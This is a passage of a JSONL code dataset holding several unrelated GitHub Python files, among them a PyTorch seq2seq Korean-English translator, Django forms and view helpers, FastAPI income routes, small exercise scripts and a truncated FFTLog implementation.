data-reactid=\"264\">\n####################################################################################################","repo_name":"CodeSigma91/Project_WebScraping","sub_path":"nyz/spiders/nyz_lite_spider.py","file_name":"nyz_lite_spider.py","file_ext":"py","file_size_in_byte":4182,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"32204541451","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nfrom DataPreparation_python import * \n\nimport torch\nimport torch.nn as nn\nfrom torch import optim\nimport torch.nn.functional as F\nfrom IPython.display import Image\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\nprint(\"Your device : \" + str(device))\n\n# 제작한 Dataset으로부터 pairs 추출\n\n\n# 필자는 현재 NVIDIA RTX 3060 Ti를 사용해서, 프로젝트를 진행했고, CPU가 아닌 GPU를 이용하기 CUDA를 사용함을 언급하고자 한다. <br />\n# 그리하여, 학습 과정에서도 CUDA를 사용한다는 전제하에 학습(train) 함수를 작성했다. <br />\n\n# <h3>Encoder & Decoder 제작</h3>\n\n# In[2]:\n\n\nclass EncoderRNN(nn.Module):\n def __init__(self, input_size, hidden_size):\n super(EncoderRNN, self).__init__()\n self.hidden_size = hidden_size\n \n self.embedding = nn.Embedding(input_size, hidden_size)\n self.gru = nn.GRU(hidden_size, hidden_size)\n \n def forward(self, input, hidden):\n embedded = self.embedding(input).view(1, 1, -1)\n output = embedded\n output, hidden = self.gru(output, hidden)\n return output, hidden\n \n def initHidden(self):\n return torch.zeros(1, 1, self.hidden_size, device=device)\n\n\n# Encoder 자체는 RNN과 매우 유사한 구조이다. RNN에 대한 자세한 설명은 생략하도록 하겠다. <br />\n# 더 나은 퍼포먼스를 위하여 RNN 셀이 아닌 GRU 셀을 이용하였다. hidden state의 초기값은 torch.zeros를 이용하여 0으로 주었다.\n\n# In[3]:\n\n\nImage(\"img/encoder.png\")\n\n\n# In[4]:\n\n\nclass DecoderRNN(nn.Module):\n def __init__(self, hidden_size, output_size):\n super(DecoderRNN, self).__init__()\n self.hidden_size = hidden_size\n \n self.embedding = nn.Embedding(output_size, hidden_size)\n self.gru = nn.GRU(hidden_size, hidden_size)\n self.out = nn.Linear(hidden_size, output_size)\n self.softmax = nn.LogSoftmax(dim=1)\n \n def forward(self, input, hidden):\n output = self.embedding(input).view(1, 1, -1)\n # what does .view(1, 1, -1) mean?\n output = F.relu(output)\n output, hidden = self.gru(output, hidden)\n output = self.softmax(self.out(output[0]))\n return output, hidden\n \n def initHidden(self):\n return torch.zeros(1, 1, self.hidden_size, device=device)\n\n\n# Decoder 또한 GRU 셀을 이용하였고, 활성화 함수는 ReLU를 이용했다. <br />\n# 이후에, 최종 ouput은 Softmax 함수를 이용하여, 다음에 올 확률이 가장 높은 단어를 선택할 수 있도록 한다. <br />\n# Encoder와 Decoder 둘 다 첨부한 사진을 토대로 코드와 비교하면서 보면 이해를 도울 수 있다. \n\n# In[5]:\n\n\nImage(\"img/decoder.png\")\n\n\n# <h3>Training</h3>\n\n# In[6]:\n\n\ndef indexesFromSentence(lang, sentence):\n return [lang.word2index[word] for word in sentence.split(' ')]\n\ndef tensorFromSentence(lang, sentence):\n indexes = indexesFromSentence(lang, sentence)\n indexes.append(EOS_token)\n return torch.tensor(indexes, dtype=torch.long, device=device).view(-1, 1)\n\ndef tensorsFromPair(pair):\n input_tensor = tensorFromSentence(input_lang, pair[0])\n target_tensor = tensorFromSentence(output_lang, pair[1])\n return (input_tensor, target_tensor)\n\n\n# 실제 training을 거치기 이전에 앞서 준비한 데이터를 tensor로 바꿔주는 과정을 거쳐야한다. <br />\n# 문장으로부터 index를 받아오는 indexesFromSentence함수, 문장을 tensor로 변환하는 tensorFromSentece 함수, <br />\n# 한 개의 영어 문장과 한 개의 프랑스어 문장으로 이루어진 Pair를 input_tensor와 target_tensor로 return 해주는 <br />\n# tensorsFromPair 함수를 제작한다. \n\n# In[7]:\n\n\nteacher_forcing_ratio = 1\n\ndef train(input_tensor, target_tensor, encoder, decoder, encoder_optimizer, decoder_optimizer, criterion,\n max_length=MAX_LENGTH):\n encoder_hidden = encoder.initHidden()\n \n encoder_optimizer.zero_grad()\n decoder_optimizer.zero_grad()\n input_length = input_tensor.size(0)\n target_length = target_tensor.size(0)\n \n encoder_outputs = torch.zeros(max_length, encoder.hidden_size, device=device)\n loss = 0\n \n for ei in range(input_length):\n encoder_output, encoder_hidden = encoder(input_tensor[ei], encoder_hidden)\n encoder_outputs[ei] = encoder_output[0, 0]\n \n decoder_input = torch.tensor([[SOS_token]], device=device)\n decoder_hidden = encoder_hidden \n \n use_teacher_forcing = True if random.random() < teacher_forcing_ratio else False\n if use_teacher_forcing:\n # Teacher forcing: Feed the target as the next input\n for di in range(target_length):\n decoder_output, decoder_hidden= decoder(decoder_input, decoder_hidden)\n loss += criterion(decoder_output, target_tensor[di])\n decoder_input = target_tensor[di] # Teacher forcing\n\n else:\n # Without teacher forcing: use its own predictions as the next input\n for di in range(target_length):\n decoder_output, decoder_hidden = decoder(decoder_input, decoder_hidden)\n topv, topi = decoder_output.topk(1)\n decoder_input = topi.squeeze().detach() # detach from history as input\n\n loss += criterion(decoder_output, target_tensor[di])\n if decoder_input.item() == EOS_token:\n break\n \n loss.backward()\n \n encoder_optimizer.step()\n decoder_optimizer.step()\n \n return loss.item() / target_length\n \n\n\n# 'Teacher Forcing' 혹은 '교사 강요'는 input과 Decoder가 예측한 단어가 아닌 실제 정답인 target을 이용해서 학습을 시키는 것을 말한다. <br/> 'Teacher Forcing'을 이용하지 않을 때에는 Decoder가 예측하는 단어를 target으로 설정하여, 학습을 진행시키는 것이다. <br />\n# '학습'은 적절한 input과 target을 이용하여, 다음에 input을 모델에 주었을 때, 적절한 target을 예측할 수 있게 하는 것이다. <br />\n# 하지만, 교사 강요를 거치지 않고, Decoder가 예측한 단어들을 아직 '정답'이라고 볼 수는 없다. <br />\n# <br/>\n# 이 코드에서는 teacher_forcing_ratio이라는 변수에 0~1 값을 선언하여, 'Teacher Forcing'을 거치는 비율 또한 설정할 수 있다. <br />\n# if use_teacher_forcing: 에서는 위에서 설명한대로 loss값을 ouput과 target_tensor로 구하는 것을 볼 수 있다. <br />\n# else: 에서는 교사 강요를 사용하지 않고 Decoder가 예측한 값을 이용하고자 ���다. DecoderRNN 클래스를 보면, Decoder는 output과 hidden state를 매번 return한다. <br />\n# .topk()은 가장 큰 element를 반환해주는 함수이다. <br />\n# <br />\n# torch.topk documentation: https://pytorch.org/docs/stable/generated/torch.topk.htmltorch.topk는 return 값으로 가장 큰 element의 value와 그 index를 return한다. <br />\n# 즉, decoder_output.topk(1)에서 가장 큰 value를 가진 element 한 개를 내보내는데, <br />\n# 그 element의 value는 topv, 그 index는 topi에 저장한다. 위 과정을 console 창에서 밑과 같이 확인할 수 있다.\n\n# In[8]:\n\n\nImage(\"img/topi.png\")\n\n\n# In[9]:\n\n\nimport time\nimport math\n\ndef asMinutes(s):\n m = math.floor(s / 60)\n s -= m * 60\n return '%dm %ds' % (m, s)\n\n\ndef timeSince(since, percent):\n now = time.time()\n s = now - since\n es = s / (percent)\n rs = es - s\n return '%s (- %s)' % (asMinutes(s), asMinutes(rs))\n\n\n# In[34]:\n\n\nplot_losses = []\ndef trainIters(encoder, decoder, n_iters, print_every=1000, plot_every=100, learning_rate=0.01):\n start = time.time()\n \n print_loss_total = 0\n plot_loss_total = 0\n \n encoder_optimizer = optim.SGD(encoder.parameters(), lr=learning_rate)\n decoder_optimizer = optim.SGD(decoder.parameters(), lr=learning_rate)\n training_pairs = [tensorsFromPair(random.choice(pairs)) for i in range(n_iters)]\n criterion = nn.NLLLoss()\n \n for iter in range(1, n_iters+1): \n training_pair = training_pairs[iter-1]\n input_tensor = training_pair[0]\n target_tensor = training_pair[1]\n \n loss = train(input_tensor, target_tensor, encoder, decoder, encoder_optimizer, decoder_optimizer, criterion)\n print_loss_total += loss\n plot_loss_total += loss\n \n if iter % print_every == 0:\n print_loss_avg = print_loss_total / print_every\n print_loss_total = 0\n print('%s (%d %d%%) loss: %.4f' % (timeSince(start, iter / n_iters), iter, (iter / n_iters * 100), print_loss_avg))\n\n if iter % plot_every == 0:\n plot_loss_avg = plot_loss_total / plot_every\n plot_losses.append(plot_loss_avg)\n plot_loss_total = 0\n\n\n# optimizer로는 SGD를 사용하였고, loss Function으로는 NLLLoss를 사용했다. <br />\n# 학습 중에 진행 과정을 시각화 해주기 위하여, asMinute 함수와 timeSince 함수를 만든다.\n\n# In[35]:\n\n\nhidden_size = 256\nencoder1 = EncoderRNN(input_lang.n_words, hidden_size).to(device)\ndecoder1 = DecoderRNN(hidden_size, output_lang.n_words).to(device)\n\n\n\n# In[36]:\n\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\n\n# 이 코드에서 GRU 셀로 만든 Encoder와 Decoder 이용한다. <br />\n# (이후에는 'Attention'을 추가한 Decoder를 적용해보고자 한다) <br />\n# Iter 횟수는 75000번, 5000번마다 진행상황을 출력하도록 했다.\n\n# <h3>Evaluate</h3>\n\n# In[25]:\n\n\ndef evaluate(encoder, decoder, sentence, max_length=MAX_LENGTH):\n with torch.no_grad():\n input_tensor = tensorFromSentence(input_lang, sentence)\n input_length = input_tensor.size()[0]\n encoder_hidden = encoder.initHidden()\n\n encoder_outputs = torch.zeros(max_length, encoder.hidden_size, device=device)\n\n for ei in range(input_length):\n encoder_output, encoder_hidden = encoder(input_tensor[ei],encoder_hidden)\n encoder_outputs[ei] += encoder_output[0, 0]\n\n decoder_input = torch.tensor([[SOS_token]], device=device) # SOS\n\n decoder_hidden = encoder_hidden\n\n decoded_words = []\n\n # decoder_attentions = torch.zeros(max_length, max_length)\n\n for di in range(max_length):\n decoder_output, decoder_hidden = decoder(decoder_input, decoder_hidden)\n # decoder_attentions[di] = decoder_attention.data\n topv, topi = decoder_output.data.topk(1)\n if topi.item() == EOS_token:\n decoded_words.append('<EOS>')\n break\n else:\n decoded_words.append(output_lang.index2word[topi.item()])\n\n decoder_input = topi.squeeze().detach()\n\n return decoded_words # decoder_attentions[:di + 1]\n \ndef evaluateRandomly(encoder, decoder, n=10):\n for i in range(n):\n pair = random.choice(pairs)\n print('>', pair[0])\n print('=', pair[1])\n output_words = evaluate(encoder, decoder, pair[0])\n output_sentence = ' '.join(output_words)\n print('<', output_sentence)\n print('')\n \n\n\n# Decoder는 처음에 input으로 SOS와 이전 hidden state인 encoder_hidden을 받는다. <br /> \n# 그리고, 이전에 설명했던 .topk를 이용하여 다음 단어를 예측한다. topi에 저장되어 있는 다음에 올 확률이 가장 단어의 index로 index2word에서 word를 조회하여 계속해서 문단어를 장에 더해준다. <br /> \n# <br />\n# 마지막으로 index로 EOS를 받으면 ���지막 문장에 EOS를 append하고 종료한다. <br />\n# 따로 translate라는 함수를 만들어놓았으므로, word2index에 이미 존재하는 word에 한해서, <br />\n# string 형식으로 프랑스어를 입력한다면, 앞서 만든 모델이 번역한 영어 문장을 받아볼 수 있다. <br />\n# (Attention 관련한 부분은 일단 주석처리 하였다)\n\n# In[26]:\n\n\ndef translate(sentence):\n output_words = evaluate(encoder1, decoder1, sentence)\n output_sentence = ' '.join(output_words)\n print(\"input(kor): \" + sentence)\n print(\"output(eng): \" + output_sentence + \"\\n\")\n\n\n# 그리고, 랜덤한 문장을 번역해 볼 수 있는 translate 함수를 제작했다.\n\n# In[27]:\n\n\n\n# loss 값이 계속해서 감소하는 것을 보아, 한국어-영어 기계번역 모델 학습 자체는 성공했지만, 보다시피 결과가 전혀 매끄럽지 못하다. <br />\n# 이에는 여러가지 요인이 존재할 수 있는데, 앞서 말하자면 한국어-영어 번역은 도전적인 Task 중 하나라고 생각한다. <br />\n# Pytorch 공식 seq2seq에서는 프랑스어-영어 기계번역을 추천한다. <br />\n# 간단한 문장에 한해서는, 손 쉽게 성공적인 번역기를 구현할 수 있기 때문이다. <br />\n# (이는 4_Deep learning_(3)에서 한 번 코딩해보고자 한다) <br />\n# <br />\n# 하지만, 한국어는 영어와 어순도 조사의 사용도 상이하기 때문에, 아무래도 간단한 seq2seq만으로는 성공적인 번역기 제작이 힘들어보인다. <br />\n# 더 성공적인 번역기 제작을 위해서는 seq2seq 이외에도 ELMO 혹은 다른 기술적인 요소가 추가되어야 할 것 같다. <br />\n# 그리고, 기본적으로 형태소 분석을 통해서, 단어를 Tokenization 이후에 번역기를 생성하는 것도 필요해보인다. <br />\n# 일단, 이후에는 'Attention'이라는 개념을 더하여, 4_Deep learning_(2)를 작성해보고자 한다. <br />\n\n# In[ ]:\n\n\n\n\n","repo_name":"jaehong21/AI_Portfolio","sub_path":"정재홍/DeepLearning_python.py","file_name":"DeepLearning_python.py","file_ext":"py","file_size_in_byte":13631,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"43477188260","text":"IF_DEVICE_IS_APPLE_INTERNAL_KEYBOARD = [\n {\n \"type\": \"device_if\",\n \"identifiers\": [\n {\n \"vendor_id\": 1452,\n \"product_id\": 636,\n \"is_keyboard\": True,\n }\n ],\n },\n]\n\nIF_DEVICE_IS_EVOLUENT_VERTICAL_MOUSE_C = [\n {\n \"type\": \"device_if\",\n \"identifiers\": [\n {\n \"vendor_id\": 6780,\n \"product_id\": 405,\n }\n ],\n }\n]\n\nIF_FRONT_APPLICATION_IS_BRAVE_OR_CHROME = [\n {\n \"type\": \"frontmost_application_if\",\n \"bundle_identifiers\": [\n r\"^com\\.brave\\.Browser$\",\n r\"^com\\.google\\.Chrome$\",\n ],\n }\n]\n\nIF_FRONT_APPLICATION_IS_PYCHARM = [\n {\n \"type\": \"frontmost_application_if\",\n \"bundle_identifiers\": [\n r\"^com\\.jetbrains\\.pycharm$\",\n r\"^com\\.jetbrains\\.pycharm-EAP$\",\n ],\n }\n]\n","repo_name":"elliotwaite/my-setup","sub_path":"scripts/karabiner/conditions.py","file_name":"conditions.py","file_ext":"py","file_size_in_byte":925,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"20910703009","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\n\nimport unittest\nimport q\nfrom CorrQ import *\nimport random as rd \nrd.seed(2019)\n\n#Correct solution\nL=[rd.randint(1,100) for i in range(20)]\nans=inverse(L) \nstudent=q.inverse(L) \n\nclass TestInverse(unittest.TestCase):\n\n\tdef test_exist_inverse(self):\n\t\tself.assertTrue(hasattr(q, 'inverse'), \"@1@: \" + _(\"You did not name the method as expected.\"))\n\n\tdef test_inverse(self):\n\t\tfor i in range(len(ans)):\n\t\t\tself.assertEqual(ans[i],student[i],\"@1@: Il y a un problème dans la fonction inverse()\")\n\nif __name__ == '__main__':\n\tunittest.main()\n","repo_name":"OpenWeek/inginious-task-LINGE","sub_path":"TP6Ex1/src/TestQ.py","file_name":"TestQ.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"32748924823","text":"from django import forms\r\nfrom django.core.exceptions import ValidationError\r\nfrom .models import UserProfile\r\nfrom django.contrib.auth.models import User\r\nfrom .models import Article, Gallery\r\nfrom tinymce.widgets import TinyMCE\r\nfrom django.forms.models import inlineformset_factory\r\nfrom parler.forms import TranslatableModelForm, TranslatedField\r\nfrom django.utils.translation import gettext_lazy as _\r\n\r\n\r\nclass TinyMCEWidget(TinyMCE):\r\n def use_required_attribute(self, *args):\r\n return False\r\n\r\n\r\nclass UpdateArticleForm(TranslatableModelForm):\r\n title = TranslatedField()\r\n description = TranslatedField()\r\n body = TranslatedField(form_class=forms.CharField, widget=TinyMCEWidget(attrs={'required': False, 'cols': 30, 'rows': 10}))\r\n\r\n class Meta:\r\n model = Article\r\n fields = {\r\n 'title',\r\n 'description',\r\n 'body',\r\n 'tree_category',\r\n 'image'\r\n }\r\n\r\n\r\nclass AddNewArticle(TranslatableModelForm):\r\n class Meta:\r\n model = Article\r\n fields = {\r\n 'title',\r\n 'description',\r\n 'body',\r\n 'tree_category',\r\n 'image'\r\n }\r\n title = TranslatedField()\r\n description = TranslatedField()\r\n body = TranslatedField(form_class=forms.CharField,\r\n widget=TinyMCEWidget(attrs={'required': False, 'cols': 30, 'rows': 10}))\r\n # body = forms.CharField(\r\n # widget=TinyMCEWidget(\r\n # attrs={'required': False, 'cols': 30, 'rows': 10}\r\n # )\r\n # )\r\n image = TranslatedField(form_class=forms.ImageField(required=False))\r\n tree_category = TranslatedField()\r\n\r\n\r\nclass UpdateProfileFormView(forms.ModelForm):\r\n\r\n class Meta:\r\n model = User\r\n fields = {\r\n 'first_name',\r\n 'last_name',\r\n 'email',\r\n }\r\n image = forms.ImageField()\r\n id = forms.IntegerField(widget=forms.HiddenInput())\r\n\r\n def save(self, commit=True):\r\n user = User.objects.get(pk=self.cleaned_data['id'])\r\n user.last_name = self.cleaned_data['last_name']\r\n user.first_name = self.cleaned_data['first_name']\r\n user.email = self.cleaned_data['email']\r\n # user.password = self.cleaned_data['password']\r\n user.save()\r\n user_image = UserProfile.objects.get(pk=user.pk)\r\n user_image.image = self.cleaned_data['image']\r\n return user_image.save()\r\n\r\n\r\nCHOICE_LIST = (\r\n ('-like', _('Popular')),\r\n ('like', _('Unpopular')),\r\n ('-id', _('New')),\r\n ('id', _('Old'))\r\n)\r\n\r\n\r\nclass ArticleGalleryForm(forms.ModelForm):\r\n class Meta:\r\n model = Gallery\r\n fields = {\r\n 'article',\r\n 'image'\r\n }\r\n # image = forms.ImageField()\r\n\r\n\r\nArticleGalleryFormSet = inlineformset_factory(Article, Gallery, form=ArticleGalleryForm, extra=1)\r\n\r\n# class FamilyMemberForm(ModelForm):\r\n# class Meta:\r\n# model = FamilyMember\r\n# exclude = ()\r\n#\r\n# FamilyMemberFormSet = inlineformset_factory(Profile, FamilyMember,\r\n# form=FamilyMemberForm, extra=1)\r\n","repo_name":"RadionovStalker/carblog_heroku2","sub_path":"blog_engine/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":3165,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"12009339618","text":"import math \n\ndef mayor(uno, dos):\n if(uno > dos):\n res = uno\n else:\n res = dos\n return res\n\ndef longitud(liscad):\n i = 0\n for x in liscad:\n i += 1\n return i\n \ndef es_palindromo(pal):\n caduno = []\n caddos = []\n\n x = len(pal)-1\n while x >= math.floor(len(pal)/2):\n caddos += pal[x]\n x -= 1\n \n i = 0\n while i <= math.floor(len(pal)/2):\n caduno += pal[i]\n i += 1\n\n return caduno == caddos\n\ndef duplica(veces,caracter):\n x = 1\n nuevocar = caracter\n while x < veces:\n nuevocar = nuevocar + caracter\n x+=1\n return nuevocar\n\n\nif __name__ == \"__main__\":\n print(mayor(2,3))\n lista = [1,2,3,4,5,6,7,8,9,10]\n cadena = \"reconocer\"\n cadenados = \"prueba\"\n cadenatres = \"sometemos\"\n print(longitud(lista))\n print(longitud(cadena))\n print(es_palindromo(cadena))\n print(es_palindromo(cadenados))\n print(es_palindromo(cadenatres))\n print(duplica(5,\"x\"))\n print(duplica(10,\"y\"))\n \n ","repo_name":"ValeLanda/IS20213-1-Lab","sub_path":"pr1.py","file_name":"pr1.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"31296935513","text":"import json\nimport re\nfrom typing import Dict, List\nfrom urllib.parse import urlparse\nimport markdown\nfrom django.template.defaultfilters import register\nfrom django.utils import safestring\nimport html\n\nfrom topics.helpers.allowed_icons import allowed_icons\n\ntag_detector = re.compile(\"#([a-zA-Z]+[A-Za-z0-9]*)\")\ntag_markup = \"\"\"\n<span class=\"tag\"><span class=\"hash\">#</span><span class=\"name\">\\g<1></span></span>\n\"\"\".strip()\n\n\ndef detect_tags(text):\n return tag_detector.findall(text)\n\n\ndef add_tags_to_topic_resources(resources: List[Dict[str, Dict[str, str]]]) -> None:\n for resource in resources:\n if resource.get(\"link\"):\n resource['link']['tags'] = detect_tags(resource['link'].get(\"metadata\", \"\"))\n if any(resource['link']['tags']):\n if resource['link']['tags'][-1] in allowed_icons:\n resource['link']['icon'] = resource['link']['tags'][-1]\n\n\ndef replace_tags(text):\n return tag_detector.sub(tag_markup, text)\n\n\ndef setup():\n @register.filter(name='markdownify')\n def markdownify(value):\n return safestring.mark_safe(markdown.markdown(replace_tags(value)))\n\n @register.filter(name='un_markdownify')\n def un_markdownify(value):\n return safestring.mark_safe(html.unescape(value))\n\n @register.filter(name='un_markdownify_input')\n def un_markdownify(value):\n return safestring.mark_safe(html.unescape(value).replace('\"', \""\"))\n\n @register.filter(name='get_item')\n def get_item(dictionary, key):\n return dictionary.get(key)\n\n\nduplicate_topic_warning = \"\"\"\n<i class=\"ss-alert\"></i>\nThere was an error while renaming or rearranging topics:\na topic with that name already exists in this category.\n\"\"\"\n\n\ndef www_remover(input_text, r=re.compile(\"^www\\.\")):\n return r.sub(\"\", input_text)\n\n\ndef url_handler(url):\n if not url.startswith(\"http\"):\n url = \"http://\" + url\n parsed = urlparse(url)\n output_url = parsed.geturl()\n domain = www_remover(parsed.netloc)\n domain_link = \"{}://{}\".format(parsed.scheme, domain)\n return domain, domain_link, output_url\n\n\ndef normalize_netloc(netloc, domain):\n if netloc:\n if netloc.startswith(\"www.\"):\n return netloc.split(\"www.\")[1]\n else:\n return netloc\n else:\n return domain\n\n\ndef normalize_url(url, domain=\"\"):\n return \"{scheme}://{netloc}{path}{params}{query}{fragment}\".format(\n scheme=url.scheme if url.scheme else \"http\",\n netloc=normalize_netloc(url.netloc, domain),\n path=\"/\" + url.path.lstrip(\"/\") if url.path else \"\",\n params=\";\" + url.params if url.params else \"\",\n query=\"?\" + url.query if url.query else \"\",\n fragment=\"#\" + url.fragment if url.fragment else \"\"\n )\n\n\ndef process(input_string) -> List[Dict[str, Dict[str, str]]]:\n if any(input_string.strip()):\n data = json.loads(input_string)\n for item in data:\n for data_type, d in item.items():\n if data_type == \"link\":\n d['url'] = url_handler(d['url'])\n return data\n else:\n return []\n\n\ndef get_client_ip(request):\n x_forwarded_for = request.META.get('HTTP_X_FORWARDED_FOR')\n if x_forwarded_for:\n ip = x_forwarded_for.split(',')[0]\n else:\n ip = request.META.get('REMOTE_ADDR')\n return ip\n","repo_name":"andychase/codebook","sub_path":"topics/helpers/view_helpers.py","file_name":"view_helpers.py","file_ext":"py","file_size_in_byte":3368,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"72519514400","text":"# Задача 1. Три друга взяли вещи в поход. Сформируйте словарь, где ключ — имя друга, а значение — кортеж вещей.\n# Ответьте на вопросы:\n# 1) Какие вещи взяли все три друга\n# 2) Какие вещи уникальны, есть только у одного друга и имя этого друга\n# 3) Какие вещи есть у всех друзей кроме одного и имя того, у кого данная вещь отсутствует\n# Для решения используйте операции с множествами.\n# Код должен расширяться на любое большее количество друзей.\n\ndata = {'Алексей': ('палатка', 'котелок', 'мангал', 'топор', 'веревка'),\n 'Константин': ('гитара', 'алкоголь', 'продукты', 'палатка', 'туалетные принадлежности', 'нож'),\n 'Анна': ('туалетные принадлежности', 'столовые приборы', 'скатерть', 'походный стол со стульями', 'кастрюля',\n 'сковорода', 'палатка')}\n\nprint('1. Какие вещи взяли все три друга?')\n# all_frends_values = set.intersection(*map(set, data.values())) # это вариант про вещи, которые есть у всех друзей\nall_items = set()\nfor items in data.values():\n all_items.update(items)\nall_items = list(all_items)\nfor item in all_items:\n print(f'\\t{item}')\n\nprint('-------------------------\\n2. Какие вещи уникальны (есть только у одного друга)? Укажите имя этого друга.')\nlst = []\nfor frend in data:\n lst.extend(list(data[frend]))\nno_item = set()\n\nfor frend, value in data.items():\n for i in range(len(value)):\n if lst.count(value[i]) == 1:\n print(f'\\t{value[i]} - {frend}')\n if lst.count(value[i]) == len(data) - 1:\n no_item.add(value[i])\n\nprint('-------------------------\\n3. Какие вещи есть у всех друзей, кроме одного? Укажите имя того, у кого данная вещь отсутствует.')\nfor frend, value in data.items():\n for i in no_item:\n if i not in data[frend]:\n print(f'\\t{i} - {frend}')\n","repo_name":"YuBarSoft/Immersion_in_Python-HW","sub_path":"HW3/task_1.py","file_name":"task_1.py","file_ext":"py","file_size_in_byte":2522,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"3533633817","text":"from typing import List\n\nfrom fastapi import (\n APIRouter,\n Depends,\n Response,\n status\n)\n\nfrom models.schemas.income import (\n IncomeGet,\n IncomeCreate,\n IncomeUpdate\n)\nfrom services.incomes import Income\n\nrouter = APIRouter(\n prefix='/incomes'\n)\n\n\n@router.get('/', response_model=List[IncomeGet])\nasync def get_incomes(\n service: Income = Depends()\n):\n return service.get_list()\n\n\n@router.post('/', response_model=IncomeGet)\nasync def create_income(\n data: IncomeCreate,\n service: Income = Depends()\n):\n return service.create(\n data\n )\n\n\n@router.get('/{key}', response_model=IncomeGet)\nasync def get_income(\n key: int,\n service: Income = Depends()\n):\n return service.get(\n key\n )\n\n\n@router.put('/{key}', response_model=IncomeGet)\nasync def update_income(\n key: int,\n data: IncomeUpdate,\n service: Income = Depends()\n):\n return service.update(\n key,\n data\n )\n\n\n@router.delete('/{key}', response_model=IncomeGet)\nasync def delete_income(\n key: int,\n service: Income = Depends()\n):\n service.delete(\n key\n )\n\n return Response(\n status_code=status.HTTP_204_NO_CONTENT\n )\n","repo_name":"cybersturmer/findragon-core-api","sub_path":"api/incomes.py","file_name":"incomes.py","file_ext":"py","file_size_in_byte":1237,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"20134447019","text":"import os\nimport numpy as np\nfrom numpy import pi, cos, sin, log, exp, sqrt, trapz\nfrom numpy.fft import rfft\nfrom scipy.interpolate import interp1d\nfrom scipy.special import gamma\n\ndef MPC(l, pn):\n \"\"\" matrix for spherical bessel transform from power spectrum to correlation function \"\"\"\n return pi**-1.5 * 2.**(-2. * pn) * gamma(1.5 + l / 2. - pn) / gamma(l / 2. + pn)\n\ndef CoefWindow(N, window=1, left=True, right=True):\n \"\"\" FFTLog auxiliary function: window sending the FFT coefficients to 0 at the edges. Adapted from fast-pt \"\"\"\n n = np.arange(-N // 2, N // 2 + 1)\n if window == 1:\n n_cut = N // 2\n else:\n n_cut = int(window * N // 2.)\n\n n_right = n[-1] - n_cut\n n_left = n[0] + n_cut\n\n n_r = n[n[:] > n_right]\n n_l = n[n[:] < n_left]\n\n theta_right = (n[-1] - n_r) / float(n[-1] - n_right - 1)\n theta_left = (n_l - n[0]) / float(n_left - n[0] - 1)\n\n W = np.ones(n.size)\n if right: W[n[:] > n_right] = theta_right - 1 / (2. * pi) * sin(2 * pi * theta_right)\n if left: W[n[:] < n_left] = theta_left - 1 / (2. * pi) * sin(2 * pi * theta_left)\n\n return W\n\nclass FFTLog(object):\n \"\"\"\n A class implementing the FFTLog algorithm.\n\n Attributes\n ----------\n Nmax : int, optional\n maximum number of points used to discretize the function\n xmin : float, optional\n minimum of the function to transform\n xmax : float, optional\n maximum of the function to transform\n bias : float, optional\n power by which we modify the function as x**bias * f\n\n Methods\n -------\n setx()\n Calculates the discrete x points for the transform\n\n setPow()\n Calculates the power in front of the function\n\n Coef()\n Calculates the single coefficients\n\n sumCoefxPow(xin, f, x, window=1)\n Sums over the Coef * Pow reconstructing the input function\n \"\"\"\n\n def __init__(self, **kwargs):\n self.Nmax = kwargs['Nmax']\n self.xmin = kwargs['xmin']\n self.xmax = kwargs['xmax']\n self.bias = kwargs['bias']\n self.dx = log(self.xmax / self.xmin) / (self.Nmax - 1.)\n self.setx()\n self.setPow()\n\n def setx(self):\n self.x = np.empty(self.Nmax)\n for i in range(self.Nmax):\n self.x[i] = self.xmin * exp(i * self.dx)\n\n def setPow(self):\n self.Pow = np.empty(self.Nmax + 1, dtype=complex)\n for i in range(self.Nmax + 1):\n self.Pow[i] = self.bias + 1j * 2. * pi / (self.Nmax * self.dx) * (i - self.Nmax / 2.)\n\n def Coef(self, xin, f, extrap='extrap', window=1):\n\n interpfunc = interp1d(xin, f, kind='cubic')\n\n fx = np.empty(self.Nmax)\n tmp = np.empty(int(self.Nmax / 2 + 1), dtype=complex)\n Coef = np.empty(self.Nmax + 1, dtype=complex)\n\n if extrap == 'extrap':\n nslow, Aslow = 0, 0\n if xin[0] > self.x[0]:\n #print ('low extrapolation')\n if f[0] * f[1] != 0.:\n nslow = (log(f[1]) - log(f[0])) / (log(xin[1]) - log(xin[0]))\n Aslow = f[0] / xin[0]**nslow\n nshigh, Ashigh = 0, 0\n if xin[-1] < self.x[-1]:\n #print ('high extrapolation')\n if f[-1] * f[-2] != 0.:\n nshigh = (log(f[-1]) - log(f[-2])) / (log(xin[-1]) - log(xin[-2]))\n Ashigh = f[-1] / xin[-1]**nshigh\n\n for i in range(self.Nmax):\n if xin[0] > self.x[i]:\n fx[i] = Aslow * self.x[i]**nslow * exp(-self.bias * i * self.dx)\n elif xin[-1] < self.x[i]:\n fx[i] = Ashigh * self.x[i]**nshigh * exp(-self.bias * i * self.dx)\n else:\n fx[i] = interpfunc(self.x[i]) * exp(-self.bias * i * self.dx)\n\n elif extrap == 'padding':\n for i in range(self.Nmax):\n if xin[0] > self.x[i]:\n fx[i] = 0.\n elif xin[-1] < self.x[i]:\n fx[i] = 0.\n else:\n fx[i] = interpfunc(self.x[i]) * exp(-self.bias * i * self.dx)\n\n tmp = rfft(fx) # numpy\n # tmp = rfft(fx, planner_effort='FFTW_ESTIMATE')() ### pyfftw\n\n for i in range(self.Nmax + 1):\n if (i < 